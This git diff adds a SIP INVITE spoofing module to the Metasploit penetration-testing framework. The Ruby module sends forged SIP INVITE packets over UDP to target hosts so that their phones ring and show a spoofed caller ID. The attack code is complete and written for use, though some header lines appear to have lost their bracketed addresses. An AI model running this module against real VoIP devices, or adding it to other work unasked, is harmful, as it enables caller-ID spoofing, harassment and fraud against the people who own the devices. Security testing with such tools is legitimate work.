diff --git a/lib/msf/core/auxiliary.rb b/lib/msf/core/auxiliary.rb index 4a122e1924..06c50578df 100644 --- a/lib/msf/core/auxiliary.rb +++ b/lib/msf/core/auxiliary.rb @@ -19,6 +19,7 @@ class Auxiliary < Msf::Module require 'msf/core/auxiliary/scanner' require 'msf/core/auxiliary/report' require 'msf/core/auxiliary/dos' + require 'msf/core/auxiliary/voip' # # Returns MODULE_AUX to indicate that this is an auxiliary module. diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb new file mode 100644 index 0000000000..05cae53d42 --- /dev/null +++ b/modules/auxiliary/voip/sip_invite_spoof.rb @@ -0,0 +1,53 @@ +require 'msf/core' + +module Msf + +class Auxiliary::Voip::SipSpoof < Msf::Auxiliary + + include Exploit::Remote::Udp + include Auxiliary::Scanner + + def initialize + super( + 'Name' => 'SIP Invite Spoof', + 'Version' => '$Revision: 3624 $', + 'Description' => 'This module will create a fake SIP invite request making the targeted device ring and display fake caller id information.', + 'Author' => 'David Maynor ', + 'License' => MSF_LICENSE + ) + + deregister_options('Proxies','SSL','RHOST') + register_options( + [ + Opt::RPORT(5060), + OptString.new('SRCADDR', [true, "The sip address the spoofed call is coming from",'192.168.1.1']), + OptString.new('MSG', [true, "The spoofed caller id to send","The Metasploit has you"]) + ], self.class) + end + + + def run_host(ip) + + begin + + name=datastore['MSG'] + src=datastore['SRCADDR'] + connect_udp + + print_status("Sending Fake SIP Invite to: #{ip}") + req = "INVITE sip:@127.0.0.1 SIP/2.0" + "\r\n" + req << "To: " + "\r\n" + req << "Via: SIP/2.0/UDP #{ip}" + "\r\n" + req << "From: \"#{name}\"" + "\r\n" + req << "Call-ID: #{(rand(100)+100).to_s}#{ip}" + "\r\n" + req << "CSeq: 1 INVITE" + "\r\n" + req << "Max-Forwards: 20" + "\r\n" + req << "Contact: " + "\r\n\r\n" + udp_sock.put(req) + disconnect_udp + + rescue Errno::EACCES + end + end +end +end